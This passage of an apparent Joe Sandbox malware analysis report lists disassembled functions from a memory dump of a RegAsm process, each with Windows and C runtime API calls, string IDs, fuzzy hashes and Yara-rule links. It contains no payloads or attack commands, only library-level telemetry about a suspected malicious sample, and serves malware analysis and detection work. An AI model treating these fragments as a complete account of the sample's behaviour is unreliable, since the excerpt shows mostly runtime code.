                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                  • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                  • Opcode ID: 07332b6ce17e2f703ef61ed6b4f156b0a394a141b95f34ed5d9ccba1d0ca9100
                                                                                                                                                                                                                                  • Instruction ID: e3e96c8ff579e253a43238db1645e7e45017178ed6114f0d3f05bd009eec5719
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07332b6ce17e2f703ef61ed6b4f156b0a394a141b95f34ed5d9ccba1d0ca9100
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50212B35A11111EFEB219B34DC99A5A3F68FF967A1F210612ED05A72C0D770ED09D6E0
                                                                                                                                                                                                                                  Function 00540BE5 Relevance: 9.2, APIs: 6, Instructions: 175COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00540C2E
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00540C99
                                                                                                                                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00540CB6
                                                                                                                                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00540CF5
                                                                                                                                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00540D54
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00540D77
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiStringWide
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2829165498-0
                                                                                                                                                                                                                                  • Opcode ID: 965879474f20308d66b19da333d38cfe82853274df6174ffd504edcd705e059b
                                                                                                                                                                                                                                  • Instruction ID: 7924bcfe56baad60bca6f69dd414dbd1d4c79609b7320330f16e382d54830c9a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 965879474f20308d66b19da333d38cfe82853274df6174ffd504edcd705e059b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9351DF7290020AABEF205FA4CC45FEB7FA9FF44758F204529FA15A7194D774AC18CBA0
                                                                                                                                                                                                                                  Function 00548C1C Relevance: 9.1, APIs: 6, Instructions: 94COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0054A0F8: Replicator::operator[].LIBCMT ref: 0054A135
                                                                                                                                                                                                                                  • DName::operator=.LIBVCRUNTIME ref: 00548CC8
                                                                                                                                                                                                                                    • Part of subcall function 0054885E: DName::operator+.LIBCMT ref: 005488C9
                                                                                                                                                                                                                                    • Part of subcall function 0054885E: DName::operator+.LIBCMT ref: 00548B93
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 00548C82
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 00548C8E
                                                                                                                                                                                                                                  • DName::DName.LIBVCRUNTIME ref: 00548CD2
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 00548CEF
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 00548CFB
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 955152517-0
                                                                                                                                                                                                                                  • Opcode ID: 6057e8de4a3bc3946397680d610b676326f041e0c2e18d8cea43842d062cffb7
                                                                                                                                                                                                                                  • Instruction ID: ea259bc8041b85ddfc26555461702d1f19262a6af636b3ae9ec508b4714b1276
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6057e8de4a3bc3946397680d610b676326f041e0c2e18d8cea43842d062cffb7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D318FB1A012049FCB14DF54C859AEEBFF4BFA9308F14885DE586A7391DB749944CB60
                                                                                                                                                                                                                                  Function 00567C9A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • .?AVAuthenticatedSymmetricCipher@CryptoPP@@, xrefs: 00567DA3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: EqualOffsetTypeids
                                                                                                                                                                                                                                  • String ID: .?AVAuthenticatedSymmetricCipher@CryptoPP@@
                                                                                                                                                                                                                                  • API String ID: 1707706676-708400366
                                                                                                                                                                                                                                  • Opcode ID: 2ca317564d3a52bdce74212441e3e6b18e266408b0b4746ca7a4d4689c7ceabc
                                                                                                                                                                                                                                  • Instruction ID: 6183c815ec9eaf9a494310280fafbb1ff3a34c911f8066f673c7857368414e6e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ca317564d3a52bdce74212441e3e6b18e266408b0b4746ca7a4d4689c7ceabc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 294167359082099BCF11CF68C481AEEBFF5FF59718F14488AE851A7381D632AE04CBA0
                                                                                                                                                                                                                                  Function 0054971C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 96COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • UnDecorator::getSignedDimension.LIBCMT ref: 0054976D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Decorator::getDimensionSigned
                                                                                                                                                                                                                                  • String ID: `template-parameter$void
                                                                                                                                                                                                                                  • API String ID: 2996861206-4057429177
                                                                                                                                                                                                                                  • Opcode ID: 429f89e7201006709f20a43ec1909a92f9b461d6af2dcfb0a2af1a8c6fb3cefb
                                                                                                                                                                                                                                  • Instruction ID: 78ea58bf3f5d40766a66675f153a780f9fd7fd566ba505c7f4f6f0a5f7840526
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 429f89e7201006709f20a43ec1909a92f9b461d6af2dcfb0a2af1a8c6fb3cefb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A312F719042099BDF04DBE4D85ABFFBBF8BB59318F10442AE601F7191DB746A08DB61
                                                                                                                                                                                                                                  Function 005504B8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,7A18E7C2,?,?,00000000,0056B350,000000FF,?,00550494,?,?,00550468,00000000), ref: 005504ED
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005504FF
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,0056B350,000000FF,?,00550494,?,?,00550468,00000000), ref: 00550521
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                  • Opcode ID: 715ae26f1df17045483f44e7f30f7cbd8e75caaab172ca77aed8a01661f39ecc
                                                                                                                                                                                                                                  • Instruction ID: edd3f38bb49b7ed2c59420e0eea74cbf21de6eeb82f48ed1eb935a135c82407f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 715ae26f1df17045483f44e7f30f7cbd8e75caaab172ca77aed8a01661f39ecc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60016235A44659EFDB118F54DC09BBEBFB8FB05B16F000626F861A32D0EBB59904CA90
                                                                                                                                                                                                                                  Function 00418600 Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00418612
                                                                                                                                                                                                                                  • int.LIBCPMTD ref: 00418624
                                                                                                                                                                                                                                    • Part of subcall function 0040E500: std::_Lockit::_Lockit.LIBCPMT ref: 0040E516
                                                                                                                                                                                                                                    • Part of subcall function 0040E500: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E540
                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMTD ref: 0041866B
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 004186E1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3053331623-0
                                                                                                                                                                                                                                  • Opcode ID: 9dfa335a9617bfa51966f1f9c5bcca831a14ce292f15ae3f1da6f232f06b58cf
                                                                                                                                                                                                                                  • Instruction ID: 4f9b08ad9ea1833e01c620b55d558fd689047bf99b404b2cebb7e2b18f99977d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9dfa335a9617bfa51966f1f9c5bcca831a14ce292f15ae3f1da6f232f06b58cf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0631B4B5D00209DFCB04DF95D585AEEBBB1BF48304F10866AE815B7390DB346A45CF95
                                                                                                                                                                                                                                  Function 0053FFF3 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 0053FFFA
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00540005
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00540073
                                                                                                                                                                                                                                    • Part of subcall function 00540156: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0054016E
                                                                                                                                                                                                                                  • std::locale::_Setgloballocale.LIBCPMT ref: 00540020
                                                                                                                                                                                                                                  • _Yarn.LIBCPMT ref: 00540036
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1088826258-0
                                                                                                                                                                                                                                  • Opcode ID: 55633578a96282770fe92a03875ab03946d864bce54cf0b12479ebad27d1b95f
                                                                                                                                                                                                                                  • Instruction ID: 01b92c8581a9b4f7daa214a8d17a277ee38d8442a4420f2831fb8f25587f8b46
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 55633578a96282770fe92a03875ab03946d864bce54cf0b12479ebad27d1b95f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED01DF75A005168BCB06EB20CC596BC7FA1FFE8340B14501AED1257392CF746E06DBC1
                                                                                                                                                                                                                                  Function 005454FF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Replicator::operator[].LIBCMT ref: 0054556B
                                                                                                                                                                                                                                  • DName::operator=.LIBVCRUNTIME ref: 00545600
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Name::operator=Replicator::operator[]
                                                                                                                                                                                                                                  • String ID: 6VT$6VT
                                                                                                                                                                                                                                  • API String ID: 3211817929-3469345667
                                                                                                                                                                                                                                  • Opcode ID: 505c11219b8a677678f10478d5e0515d3b53fb340e56792bb3c65efe8514eb71
                                                                                                                                                                                                                                  • Instruction ID: 436718d72e149dd348de0bf8956e36b9ce54331c099c73560438a4ae18dc5a68
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 505c11219b8a677678f10478d5e0515d3b53fb340e56792bb3c65efe8514eb71
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0313631600A049FDB14DBA4E8497FE7FAAFB56B1DF14442DE582D7282EF789844CB50
                                                                                                                                                                                                                                  Function 0054684C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00544103: pDNameNode::pDNameNode.LIBCMT ref: 00544129
                                                                                                                                                                                                                                  • DName::DName.LIBVCRUNTIME ref: 0054690B
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 00546919
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Name$Name::Name::operator+NodeNode::p
                                                                                                                                                                                                                                  • String ID: void$void
                                                                                                                                                                                                                                  • API String ID: 3257498322-3746155364
                                                                                                                                                                                                                                  • Opcode ID: e6938d89f6235a91674158057764b790ed661707474b7a1337765f99360457c9
                                                                                                                                                                                                                                  • Instruction ID: 2e0dcc8e48a0956e0fc30b177fb4e7bc1997c403489e9a914e9954fe780c0bce
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6938d89f6235a91674158057764b790ed661707474b7a1337765f99360457c9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E72131B5904109EFDF04DF90C859AFE7FB8FB09308F108559E906A7251EBB05658DF51
                                                                                                                                                                                                                                  Function 00558A61 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetConsoleOutputCP.KERNEL32(7A18E7C2,00000000,00000000,00000000), ref: 00558AC4
                                                                                                                                                                                                                                    • Part of subcall function 0055C005: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0055DF67,?,00000000,-00000008), ref: 0055C066
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00558D16
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00558D5C
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00558DFF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2112829910-0
                                                                                                                                                                                                                                  • Opcode ID: 02c84562db3c98fad455ef878ab7dbca0ae57f6865a1298bf05add676ed35f88
                                                                                                                                                                                                                                  • Instruction ID: c0e2e953aae1e6e7c68fbab58dcd358975a46ae928b399a39bb9de7c245bd999
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 02c84562db3c98fad455ef878ab7dbca0ae57f6865a1298bf05add676ed35f88
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AD17AB5D002489FCF05CFA8D8949ADBFB9FF48315F28452AE856FB351DA30A949CB50
                                                                                                                                                                                                                                  Function 00546923 Relevance: 6.2, APIs: 4, Instructions: 192COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 0054692A
                                                                                                                                                                                                                                  • UnDecorator::getSymbolName.LIBCMT ref: 005469BC
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 00546AC0
                                                                                                                                                                                                                                  • DName::DName.LIBVCRUNTIME ref: 00546B63
                                                                                                                                                                                                                                    • Part of subcall function 005444DA: shared_ptr.LIBCMT ref: 005444F6
                                                                                                                                                                                                                                    • Part of subcall function 005446D9: DName::DName.LIBVCRUNTIME ref: 00544727
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Name$Name::$Decorator::getH_prolog3Name::operator+Symbolshared_ptr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1134295639-0
                                                                                                                                                                                                                                  • Opcode ID: 17b545686ffbd83f461e5fa8e49ff6911f03a41484d8adaf88abe412f4fcb787
                                                                                                                                                                                                                                  • Instruction ID: adde3340624beed78fb7815e48ae6e54cb2a8d11efd9e0536a69273dc1d5f33f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17b545686ffbd83f461e5fa8e49ff6911f03a41484d8adaf88abe412f4fcb787
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD7147B1D00219DFDB00CFA4D885BEDBFB8FB1A318F14542AE941BB291DB749944DB61
                                                                                                                                                                                                                                  Function 00546F9D Relevance: 6.2, APIs: 4, Instructions: 169COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 005470D2
                                                                                                                                                                                                                                    • Part of subcall function 00544216: __aulldvrm.LIBCMT ref: 00544247
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 00547033
                                                                                                                                                                                                                                  • DName::operator=.LIBVCRUNTIME ref: 00547117
                                                                                                                                                                                                                                  • DName::DName.LIBVCRUNTIME ref: 00547149
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Name::operator+$NameName::Name::operator=__aulldvrm
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2973644308-0
                                                                                                                                                                                                                                  • Opcode ID: 99b5cd79d29699f7cf1e02f05b5d71bffb07d26f1fc7d65a0859f400205991c3
                                                                                                                                                                                                                                  • Instruction ID: b98d7673acd3daae7ff34dee4b301045ff4dff8c8419de0e582cf73e8e56fba6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99b5cd79d29699f7cf1e02f05b5d71bffb07d26f1fc7d65a0859f400205991c3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81618AB0904219EFCB14CF94CC85AEEBFB4FB5A308F1494AAE941AB351D7709A44DF90
                                                                                                                                                                                                                                  Function 0051C640 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 109COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000010), ref: 0051C663
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                  • String ID: operation failed with error $OS_Rng: $P@
                                                                                                                                                                                                                                  • API String ID: 1452528299-2227021971
                                                                                                                                                                                                                                  • Opcode ID: c47d9e280b39bfe97f86c1afe3e74863a323abe918de4f1992f9490999ff8e1a
                                                                                                                                                                                                                                  • Instruction ID: 7d1ade67ec2d759c352fa15240a005782d59d69d9f8779f71aae645f15b0fe31
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c47d9e280b39bfe97f86c1afe3e74863a323abe918de4f1992f9490999ff8e1a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 875116B1D00248EFCB05DFA9D951BEEBBB4BF48304F2085ADE415A7381DB745A44CBA5
                                                                                                                                                                                                                                  Function 0040BFA0 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __aulldiv
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3732870572-0
                                                                                                                                                                                                                                  • Opcode ID: cb24858b38ca5f96361cca1c3c554668d37f17c0265753c7f8a9988f1c73d6fe
                                                                                                                                                                                                                                  • Instruction ID: a8bb27bb9ea891491c7cdd180f1d72b25329bb109c8645e91b68c3f2cac08202
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb24858b38ca5f96361cca1c3c554668d37f17c0265753c7f8a9988f1c73d6fe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E121FAB5610309ABEB11DF14CC82FAE7BA5FB88704F24C459F9189F285D674E911CB98
                                                                                                                                                                                                                                  Function 00540837 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000400,?,?,?,004F4C37,00000000,00000000,?,?,?,004F4C37,?,?,?,00000000), ref: 00540854
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,004F4C37,?,?,?,00000000,00000000), ref: 00540860
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,004F4C37,00000000,00000000,?,?,?,004F4C37,?,?,?,00000000), ref: 00540886
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,004F4C37,?,?,?,00000000,00000000), ref: 00540892
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 203985260-0
                                                                                                                                                                                                                                  • Opcode ID: 9d15dc997c8cb139624ddcd69354d736c771ef8327062e0090a6e7e09d49c481
                                                                                                                                                                                                                                  • Instruction ID: 0e87ead7e97f2a384fcfa5accfbb4679788fe648df4865f963f00f746cf5b545
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d15dc997c8cb139624ddcd69354d736c771ef8327062e0090a6e7e09d49c481
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB011236600159FB8F221F56DD08D9F3E26FBD97A4B108414FE0596160C631C821EBE0
                                                                                                                                                                                                                                  Function 00565D2A Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0056233B,00000000,00000001,0000000C,00000000,?,00558E53,00000000,00000000,00000000), ref: 00565D41
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0056233B,00000000,00000001,0000000C,00000000,?,00558E53,00000000,00000000,00000000,00000000,00000000,?,0055942D,?), ref: 00565D4D
                                                                                                                                                                                                                                    • Part of subcall function 00565D13: CloseHandle.KERNEL32(FFFFFFFE,00565D5D,?,0056233B,00000000,00000001,0000000C,00000000,?,00558E53,00000000,00000000,00000000,00000000,00000000), ref: 00565D23
                                                                                                                                                                                                                                  • ___initconout.LIBCMT ref: 00565D5D
                                                                                                                                                                                                                                    • Part of subcall function 00565CD5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00565D04,00562328,00000000,?,00558E53,00000000,00000000,00000000,00000000), ref: 00565CE8
                                                                                                                                                                                                                                  • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0056233B,00000000,00000001,0000000C,00000000,?,00558E53,00000000,00000000,00000000,00000000), ref: 00565D72
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2744216297-0
                                                                                                                                                                                                                                  • Opcode ID: 2c79a9b71dde108c042268ae03deb70890c93da81b5c5ed260085af2a5d2905b
                                                                                                                                                                                                                                  • Instruction ID: 3094af20ac564f96aac9fc6e02964965070340a0e80f802341230c335d1401f4
